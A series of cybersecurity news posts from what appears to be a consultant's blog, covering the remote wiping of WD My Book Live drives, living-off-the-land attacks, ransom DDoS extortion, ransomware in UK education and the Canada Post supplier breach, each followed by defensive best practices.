Thought leadership. Threat analysis. Cybersecurity news and alerts.
Western Digital (WD) Hard Drives Remotely Wiped Clean Worldwide
Users worldwide of Western Digital (WD) hard drives, specifically My Book Live and My Book Live Duo devices, found their hard drives being wiped clean remotely last June 23.
Last June 24, a WD user named “sunpeak” started a thread on WD Community forum stating that all the data on his WD My Book Live device is gone. “Previously the 2T volume was almost full but now it shows full capacity,” sunpeak said.
Hundreds of WD My Book Live and My Book Live Duo devices echoed sunpeak, stating that their devices have been wiped clean remotely as well.
“It is very scary that someone can do factory restore the drive without any permission granted from the end user,” sunpeak said. The tread started said he found this user.log in the affected device:
Jun 23 15:14:05 MyBookLive factoryRestore.sh: begin script:
Jun 23 15:14:05 MyBookLive shutdown: shutting down for system reboot
Jun 23 16:02:26 MyBookLive S15mountDataVolume.sh: begin script: start
Jun 23 16:02:29 MyBookLive _: pkg: wd-nas
Jun 23 16:02:30 MyBookLive _: pkg: networking-general
Jun 23 16:02:30 MyBookLive _: pkg: apache-php-webdav
Jun 23 16:02:31 MyBookLive _: pkg: date-time
Jun 23 16:02:31 MyBookLive _: pkg: alerts
Jun 23 16:02:31 MyBookLive logger: hostname=MyBookLive
Jun 23 16:02:32 MyBookLive _: pkg: admin-rest-api
Another WD user added this message to the thread: “All my data is gone too. Message in GUI says it was ‘Factory reset’ today! 06/23. I am totally screwed without that data … years of it.”
Western Digital Statement
Last June 25, US-based company Western Digital recommended to users to disconnect their My Book Live and My Book Live Duo devices from the internet to protect their data on these devices. My Book Live and My Book Live Duo devices were introduced to the market in 2010 and these devices received their final firmware update in 2015.
“Western Digital has determined that some My Book Live devices are being compromised by malicious software,” Western Digital said. “In some cases, this compromise has led to a factory reset that appears to erase all data on the device.”
According to Western Digital, the log files that they’ve reviewed show that the attackers directly connected to the affected My Book Live and My Book Live Duo devices from a variety of IP addresses in different countries. The company said this shows that the affected devices were directly accessible from the internet, via direct connection or port forwarding that was enabled either manually or automatically via UPnP.
“Western Digital has determined that some My Book Live and My Book Live Duo devices are being compromised through exploitation of a remote command execution vulnerability,” Western Digital said.
The specific remote command execution vulnerability referred to by Western Digital is CVE-2018-18472 – in which all versions of Western Digital (WD) My Book Live has a root Remote Command Execution bug via shell metacharacters in the /api/1.0/rest/language_configuration language parameter. This security vulnerability can be triggered by anyone who knows the IP address of the affected device. A proof-of-concept on how to exploit CVE-2018-18472 is publicly available.
As the last firmware update of WD My Book Live and My Book Live Duo devices was in 2015, CVE-2018-18472 vulnerability, therefore, wasn’t answered by WD developers in 2015.
Other Cyberattacks Affecting Hard Drives/Backups
WD My Book Live and My Book Live Duo devices can be attached to the network, as such, they’re known as network-attached storage (NAS) devices. Other examples of NAS devices are those made by Taiwanese corporation QNAP Systems, Inc.
In the past few years, QNAP NAS devices have been the target of malicious actors. In 2019, researchers at Intezer detected the malicious software known as QNAPCrypt.
"QNAP is a well-known vendor for selling NAS servers, which the malware was intended to infect and encrypt the containing files for ransom,” researchers at Intezer said. “NAS servers normally store large amounts of important data and files, which make them a valuable target for attackers and especially a viable target for ransomware campaigns.”
In 2014, researchers at FireEye observed cyberattackers attempting to exploit the BASH remote code injection vulnerability against QNAP NAS devices.
"These attacks result in the hackers having a root level remote shell, gaining full access to the contents of the NAS,” FireEye researchers said. “NAS systems are used by enterprises to store large volumes of files and house databases, as well as by consumers for personal storage. This makes NAS an attractive target for attackers given the broad types of data they handle. In this case, the attackers can gain full access the NAS contents as well as execute other commands.”
Cybersecurity Best Practices
The deletion of enormous data in WD My Book Live and My Book Live Duo devices is a lesson learned for many users.
Network-attached storage (NAS) devices, including WD My Book Live and My Book Live Duo devices and QNAP devices are becoming the target of cyberattackers due to the wealth of data that these devices hold.
It is important to practice the time-honored 3-2-1 backup rule. This rule states that your organization needs to have 3 copies of critical data (one production data and 2 backup copies), with two copies in different media, and one copy kept offsite for disaster recovery.
Living off the land has become the standard in today’s cyberattacks intent on evading security solutions.
Living off the land attack takes its name from the “living off the land” way of life, that is, living by eating only the food that one produces from the land.
In the cybersecurity context, living off the land cyberattack refers to turning legitimate programs and processes to perform nefarious activities. Living off the land enables cyberattackers to blend into victims’ networks and hide among the legitimate programs and processes to carry out a stealth attack. Traditional security solutions often ignore living off the land attacks as these activities are considered legitimate activities coming from legitimate programs and processes.
Astaroth: Example of a Malware that Lives Off the Land
Astaroth is an example of a malicious software (malware) that completely lived off the land to avoid detection. Astaroth is an info-stealing malware that abuses various legitimate Windows processes in an attempt to run undetected on computers using Windows operating system.
In the blog post "Latest Astaroth living-off-the-land attacks are even more invisible but not less observable," Microsoft Defender Security Research Team said they started seeing the updated attack chain of Astaroth in late 2019. In mid-2019, Microsoft Defender Security Research Team observed an unusual spike in activities related to Windows Management Instrumentation Command-line (WMIC), prompting the team to investigate it and found out that the unusual spike in activities related to WMIC was part of the Astaroth attack chain.
WMIC provides a command-line interface for Windows Management Instrumentation (WMI) – referring to the infrastructure for management data and operations on Windows operating systems.
Microsoft Defender Security Research Team said that after the WMIC abuses were exposed, Astaroth now completely avoids the use of WMIC and instead introduced new living off the land techniques that make the attack chain even stealthier such as abusing Alternate Data Streams (ADS) and abusing the legitimate process ExtExport.exe.
Alternate Data Streams (ADS) is a feature in Windows operating system that contains metadata for locating a specific file by title or author. ExtExport.exe, meanwhile, is a feature that ships with Internet Explorer to run a file. Microsoft Defender Security Research Team said that Astaroth uses ExtExport.exe to load malicious payload, while ADS is used to hide malicious payloads.
Other Examples of Living Off the Land Attacks
In the report “The Active Adversary Playbook 2021,” Sophos found that PowerShell and PsExec are among the top 3 legitimate tools used by cyberattackers in 2020 and early 2021. PowerShell and PsExec are legitimate Windows operating system tools used by system administrators.
PowerShell is an interactive command-line interface and scripting environment included in the Windows operating system, while PsExec is a Windows tool that can be used to execute a program on another computer. Microsoft said, “PsExec's most powerful uses include launching interactive command-prompts on remote systems and remote-enabling tools like IpConfig that otherwise do not have the ability to show information about remote systems.”
According to Mitre, PowerShell commands and scripts have been known to execute malicious payloads, create new tasks on remote machines, identify configuration settings, evade defenses, exfiltrate data, pull Active Directory information from the target environment, issue interactive commands over a network connection, and access credential data.
Mitre reported that PsExec has been abused to download or upload a file over a network share, write programs to the ADMIN$ network share to execute commands on remote systems, and execute binaries on remote systems using a temporary Windows service.
Windows legitimate features aren’t the only programs abused by attackers in living off the land attacks. Third-party programs are also abused by living off the land attackers.
In 2017, the Petya, also known as NotPetya, malware spread worldwide via a tainted accounting software of the Ukrainian-based company MeDoc. In 2020, researchers at Sophos reported that the group behind the ransomware called "RobbinHood" used the signed driver, part of a now-deprecated software package published by Taiwan-based motherboard manufacturer Gigabyte as a means so that the threat group could load a second, unsigned driver into Windows.
“This second driver then goes to great lengths to kill processes and files belonging to endpoint security products, bypassing tamper protection, to enable the ransomware to attack without interference,” Sophos said.
Living off the land attackers recently tainted SolarWinds software affecting thousands of the customers of SolarWinds that downloaded the tainted version of SolarWinds software.
Cybersecurity Best Practices
Here are some of the cybersecurity best practices in preventing and mitigating the effects of living off the land attacks:
Switch off or remove unneeded programs
Ransom DDoS Extortion On the Rise Again
A recent report from researchers at Proofpoint showed that ransom distributed denial-of-service (DDoS) extortions are on the rise again.
In the blog post “Ransom DDoS Extortion Actor 'Fancy Lazarus' Returns,” researchers at Proofpoint reported that since May 21, 2021, they've observed renewed DDoS extortion activity targeting an increasing number of industries by the threat group known as "Fancy Lazarus." In a DDoS attack, a system (website, network, application server, DNS server, and individual IP) is flooded with data requests in a bid to shut it down.
“The ransom distributed denial of service extortion threat actor known as ‘Fancy Lazarus’ is back, taking aim at an increasing number of industries, including the energy, financial, insurance, manufacturing, public utilities, and retail sectors,” researchers at Proofpoint said. “The actor [Fancy Lazarus] took over a month-long break from April to May 2021 before returning with new campaigns that include some changes to the group’s tactics, techniques, and procedures ….”
According to researchers at Proofpoint, the threat group’s latest campaign changes the group’s name to Fancy Lazarus from previous names such as “Lazarus,” “Lazarus Group,” and “Armada Collective.” The researchers found no connection between this ransom DDoS extortion group and the advanced persistent threat (APT) actors with the same names.
Ransom DDoS Extortion Prevalence
On November 1, 2019, CERT NZ reported that it received reports relating to an extortion campaign targeting companies within the financial sector in New Zealand. The extortion campaign, CERT NZ said, involved two phases. The first phase involved an email stating the name of the extortionist, the name of the target company, the deadline when the major DDoS attack will occur and the demand for a ransom to prevent it.
The second phase, according to CERT NZ, involved a demonstrative DDoS attack (typically lasting 30 minutes) against an IP address belonging to the companies’ network. CERT NZ said the DDoS techniques used in the demonstrative DDoS attack, include targeting services using the following protocols:
Hyper Text Transfer Protocol (HTTP)
Web Service Dynamic Discovery (WSD)
Apple’s Remote Management Service (ARMS)
Simple Service Discovery Protocol (SSDP)
Network Time Protocol (NTP)
Domain Name System (DNS)
Lightweight Directory Access Protocol (LDAP)
SYN and Internet Control Message Protocol (ICMP)
On November 15, 2019, researchers at Akamai said multiple companies have reported receiving an email demanding 2 bitcoins. Akamai said the extortion email contains a threat that if payment isn’t made before the deadline expires, the price increases by 1 bitcoin and the targeted DDoS attack will start.
“Shortly after a customer received one of these extortion emails, Akamai observed a 30Gbps attack (at peak) originating from a globally distributed botnet, where each IP sent a fraction of the overall traffic,” Akamai said. “The attackers were abusing DNS, Apple Remote Management Service (ARMS), CLDAP, TFTP, PortMap, and WS-Discovery (WSD), across the UDP protocol.”
In August 2020, the Federal Bureau of Investigation (FBI) issued an alert warning that thousands of organizations in multiple industries across the globe were targeted in the ransom DDoS extortion campaign similar to the ransom DDoS extortion campaign described by Akamai and CERT NZ. According to the FBI, DDoS "demonstration" launched by the threat group varied across institutions with some targeting a single IP address and others targeting multiple IP addresses, as well as variable peak volumes and attack length.
In the August 2020 blog post "Ransom Demands Return: New DDoS Extortion Threats From Old Actors Targeting Finance and Retail," researchers at Akamai said they’ve observed ransom DDoS attacks peak at almost 200 Gb/sec, utilizing ARMS, DNS Flood, GRE Protocol Flood, SNMP Flood, SYN Flood, and WSDiscovery Flood attacks as their main vectors.
Teresa Walsh, global head of intelligence at the Financial Services Information Sharing and Analysis Center (FS-ISAC), a cybersecurity consortium of nearly 7,000 financial companies told the Wall Street Journal last February that the global nature of the targets of the ransom DDoS extortion campaign was alarming, citing victims in North America, Latin America, Europe, the Middle East, Africa, and Asia-Pacific.
“After about four or five members raised their hands to say that they were seeing similar activity [ransom DDoS extortion], that’s when we started diving into a potential campaign against our members,” said Walsh. “This accumulated week upon week. Even months later, we were still seeing extortion emails coming through, and short-lived attacks,” Ms. Walsh said.
Ransom DDoS Extortion Campaign Modus Operandi
According to Proofpoint researchers, the ransom DDoS extortion campaign modus operandi always begins with sensational emails. The researchers said the extortion emails contain the following:
It’s important to note that DDoS attack against websites, networks, application servers, DNS servers, and individual IPs is now preventable with a DDoS protection solution.
Rise of Ransomware Attacks in the Education Sector
The National Cyber Security Centre (NCSC), an organization of the UK Government that provides cybersecurity guidance and support, recently reported that it has continued to respond to an increased number of ransomware attacks against schools, colleges and universities in the UK.
“As of late May/June 2021, the NCSC is investigating another increase in ransomware attacks against schools, colleges and universities in the UK,” NCSC said. The NCSC previously highlighted an increase in ransomware attacks on the UK education sector during August/September 2020 and again in February 2021.
Ransomware and Its Impact
Ransomware is a type of malicious software (malware) that’s traditionally known to encrypt victims’ files, preventing victims to access these files. After file encryption, a ransom note is shown on the compromised computer informing the victim to pay a certain amount, typically in the form of cryptocurrency, for the decryption tool that would unlock the encrypted files.
More recently, ransomware operators threaten victims to release files stolen from the victim’s network in case of refusal to pay the ransom for the decryption tool. More ransomware operators have recently employed the double ransom tactic, in which, a victim is asked to pay two ransom payments.
The first ransom payment is for the decryption tool while the second ransom payment is for the non-publication of the files stolen from the victim’s network. Ransomware operators maintain “name and shame” websites on the darknet to name and shame ransomware victims who continue to refuse to pay ransom.
“In recent incidents affecting the education sector, ransomware has led to the loss of student coursework, school financial records …,” NCSC said. According to the NCSC, ransomware attacks in the education sector can have a devastating impact on organizations, with victims requiring a significant amount of recovery time to reinstate critical services, and these events can also be high profile in nature, with wide public and media interest.
An attack vector refers to the path or means in which an attacker gains access to an organization’s network to deliver a malware, in this case, a ransomware. According to the NCSC, ransomware attackers can gain access to a victim’s network through remote access systems, phishing emails, and other vulnerable software or hardware.
According to the NCSC, attackers gain access to victims’ networks through remote access systems such as remote desktop protocol (RDP) and virtual private networks (VPN). RDP is a proprietary protocol developed by Microsoft that allows employees working from home to access their office desktop computers or servers from another device over the internet.
The shift towards remote learning over the past year as a result of COVID-19 restrictions resulted in many organizations deploying VPN access as VPN is viewed as a secure way of accessing company networks and private resources. In recent years, multiple security vulnerabilities have been discovered in RDP and in a number of VPN appliances such as Citrix, Fortinet, Pulse Secure and Palo Alto.
According to the NCSC, phishing emails are frequently used by attackers to deploy ransomware. An attacker sends a phishing email – disguised as coming from a legitimate sender – to trick the email receiver to click a link or download an attachment, enabling the deployment of the ransomware into the email receiver’s computer.
Other Vulnerable Software or Hardware
According to the NCSC, unpatched or unsecure devices have commonly been used by ransomware attackers as an easy route into networks. An example of a software vulnerability exploited by ransomware attackers to install ransomware on a network is the vulnerability in Microsoft Exchange Servers.
The NCSC added that ransomware attackers have recently been observed sabotaging backup devices in order to make recovery more difficult; encrypting the entire virtual servers, and using scripting environments, for example, PowerShell, to easily deploy the ransomware.
Cybersecurity Best Practices
Here are some cybersecurity best practices as recommended by the NCSC that can be employed by organizations in the education sector in order to prevent and mitigate the effects of ransomware attacks:
Keep up-to-date and tested offline backups.
As ransomware attackers have been known for sabotaging internet-exposed backup devices in order to make recovery more difficult, it’s important to keep offline backups to recover from a ransomware attack.
Secure remote access systems (RDP and VPN) via strong passwords, multi-factor authentication (MFA), and applying patches in a timely manner.
Implement effective vulnerability management and patching procedures.
Implement the following mechanisms to prevent phishing attacks: making it harder for email from your domains to be spoofed by employing the anti-spoofing controls, filtering or blocking incoming phishing emails, training your users particularly in the form of phishing simulations, and building a culture where users can report phishing attempts.
Canada Post Becomes the Latest Victim of Supply Chain Attack
Canada Post recently announced that it fell victim to a supply chain attack, resulting in a data breach relating to nearly a million receiving customers.
A supply chain attack, also known as a third-party attack, happens when an attacker infiltrates your organization’s system through an outside partner or supplier with access to your organization’s system.
In a press statement released last May 26th, Canada Post said that it was informed last May 19th by one of its suppliers, Commport Communications, that this supplier suffered a ransomware attack and that said ransomware attack compromised Canada Post customers.
Commport Communications’ electronic data interchange (EDI) solution is used by Canada Post to manage the shipping manifest data of large parcel business customers. Shipping manifests typically include sender and receiver contact information such as the names and addresses of the business sending the item and the customer receiving it.
“In all, the impacted shipping manifests for the 44 commercial customers contained information relating to just over 950 thousand receiving customers,” Canada Post said.
Canada Post added that the impacted shipping manifests were from July 2016 to March 2019 and that the vast majority (97%) contained the name and address of the receiving customer, while the remainder (3%) contained an email address and/or phone number.
“We are now working closely with Commport Communications and have engaged external cyber security experts to fully investigate and take action,” Canada Post said. “We are proactively informing the impacted business customers and providing the information and support necessary to help them determine their next steps. As well, the Office of the Privacy Commissioner has been notified.”
According to Canada Post, in November 2020, Commport Communications notified Innovapost, Canada Post's IT subsidiary, of a potential ransomware issue. Canada Post said that Commport Communications advised at that time that there was no evidence to suggest any customer data had been compromised.
In December 2020, the group behind the ransomware called “Lorenz” posted on its data leak site that they had breached Commport Communications during a ransomware attack.
Lorenz ransomware is a relatively new actor in the ransomware field. Similar to other ransomware, Lorenz encrypts victims’ files and demands from victims ransom for the decryption tool that would unlock the encrypted files. Michael Gillespie of ID Ransomware told BleepingComputer that the Lorenz ransomware and older ransomware known as “ThunderCrypt” have the same encryptor. It isn’t clear whether Lorenz and ThunderCrypt are operated by the same group or if the newer ransomware purchased the source code of the older ransomware to create its own variant.
Similar to other ransomware, Lorenz ransomware steals victims’ files. And similar to other ransomware groups, the group behind Lorenz ransomware maintains a website in which password-protected archives of stolen files are published.
According to BleepingComputer, the group behind Lorenz ransomware is different from other ransomware groups as this group first sells the stolen data to other threat actors or possible competitors. In case no one buys the stolen data and the victim refuses to pay, the group behind Lorenz ransomware releases the password for the password-protected data leak archive in order to make the stolen data available to anyone who downloads the files.
Another peculiar characteristic of the group behind Lorenz ransomware is that the group also sells access to the victim's internal network along with the data. Access to the victim's internal network, for some threat actors, is more valuable than the data.
“Like other human-operated ransomware attacks, Lorenz will breach a network and spread laterally to other devices until they gain access to Windows domain administrator credentials,” BleepingComputer said. “While spreading throughout the system, they will harvest unencrypted files from victims' servers, which they upload to remote servers under their control.”
Cybersecurity Best Practices
Many human-operated ransomware attacks gain initial access to their victims’ networks by brute-forcing RDP (Remote Desktop Protocol) – a network communications protocol developed by Microsoft that allows users to remotely connect to another computer.
RDP servers that use weak username and password combination, without multi-factor authentication (MFA), without virtual private networks (VPNs), and without other security protections are easily accessed by attackers through brute force attack – the trial and error method of guessing the correct username and password combination. Threat actors have also been known to use RDP for lateral movement. With RDP, attackers can move laterally through the network without the need for credentials.
RDP servers can be protected from brute force attacks by using a strong username and password combination, MFA, and VPN. Attackers easily scan for internet-exposed RDP through the default RDP port: TCP 3389. Changing the RDP default RDP port essentially hides your organization’s RDP server from the attackers’ scanning efforts.
In the blog post "Human-operated ransomware attacks: A preventable disaster," Microsoft 365 Defender Threat Intelligence Team recommends practicing the principle of least privilege and maintaining credential hygiene. “Avoid the use of domain-wide, admin-level service accounts,” Microsoft 365 Defender Threat Intelligence Team said. “Enforce strong randomized, just-in-time local administrator passwords. Use tools like LAPS.”
Steve E. Driz, I.S.P., ITCP